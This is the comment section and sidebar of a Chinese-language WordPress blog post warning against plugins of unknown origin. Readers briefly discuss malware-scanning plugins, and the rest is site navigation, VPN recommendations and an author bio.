byJohntool-工具王阿璋 你可能會喜歡... 【WordPress教學】5分鐘教你如何使用UpdraftPlus定期備份並且上傳雲端 【WordPress教學】強大的官方推薦外掛，Jetpack完整設定教學！ 【WordPress教學】如何自訂WordPress語法？6個程式碼片段範例教學 【WordPress教學】免費的目錄外掛，5分鐘輕鬆搞定你的WordPress目錄 【WordPress教學】收不到信怎麼辦？5分鐘教你如何檢測及修復寄信功能！ 相關文章 文章導覽 ←Previous文章Next文章→ 4thoughtson“【WordPress安全】千萬不要安裝來路不明的外掛！實際案例分享” 請問有專門的外掛可以檢查出網站是否有惡意代碼的外掛嗎？ Reply 比較知名的像是Sucurl跟Malcare，但還是要找官方來源下載！ Reply 那推資詭異的資料夾是gravityform的addons啦 Reply 原來如此，感謝說明，不過我的重點不是放在那邊 Reply 發表迴響取消回覆 站內搜尋 我的新書打開網路就有錢-呂明璋（工具王阿璋）索取免費資源VPN推薦【VPN推薦】2021年最穩定VPN翻牆工具 CP值最高的VPN：NordVPN CP值最高的VPN：surfshark 最適合翻牆的VPN：IvacyVPN 品質最好的VPN：ExpressVPN WordPress架站主機推薦【架站教學】新手快速架站教學，使用Cloudways架設WordPress網站！ 線上課程學習推薦程式語言學習推薦文章分類文章分類 選取分類 Fintech    區塊鏈       NFT    虛擬貨幣       Pionex派網系列教學       加密貨幣交易所       加密貨幣放貸教學    讚賞公民 VPN推薦    VPN教學    VPN評價 WordPress    WordPress主機    WordPress主題    WordPress外掛    WordPress安全    WordPress程式碼 優惠活動 學習資源 懶人包 程式語言    batch    C    CSS    Java    JavaScript    PHP    Python    Shell 精選文章 網路資源    APP推薦    免費資源    好用軟體    實用技巧    擴充功能    網路賺錢    線上工具    線上課程    資訊安全 翻牆推薦 自由工作者    採訪    接案    社群經營    站長之路    美股投資    聯盟行銷    被動收入    讀書心得    部落格經營 阿璋推薦 關於我 大家好，我是John，也可以叫我阿璋，在這裡我希望能提供大家一些快速上手的程式語言、好用軟體的教學，以及讓人人快速建立自己的網站！ 想知道阿璋是如何開啟部落格之旅嗎？ 查看Johntool-工具王阿璋的起源 如果你喜歡我的文章，歡迎在右上方填寫Email訂閱我的部落格，或是在文章下方分享留言。

Facebook粉絲專頁與Instagram創立囉！如果想收到更多、更迅速的消息可以按讚追蹤~ 熱門文章︰ 【VPN推薦】2022年超推9款免費與付費VPN翻牆排名評價 【2022】超完整免費可商用中文字型，包含官方下載連結不怕侵權！ 【Demi-HumanNFTs介紹】亞太區最友善新手的NFTDAO社群 【2022】12個最好的免費、付費螢幕錄影軟體推薦（Windows/Mac版） 【2022/3月】最新iRent優惠碼推薦-超過3小時免費租車時數！ 【2022最強iSpoofer教學】PokemonGO飛人教學、外掛修改GPS定位 Win10筆電Wifi功能消失怎麼辦？AcerSwift3五個步驟修復成功！ 支持本站本站提供的資源全部免費，所以如果我的文章對你有幫助，可以請我一杯咖啡！ 如果是海外的讀者，也歡迎使用PayPal贊助阿璋！ 看個廣告支持阿璋吧！ 回到頂端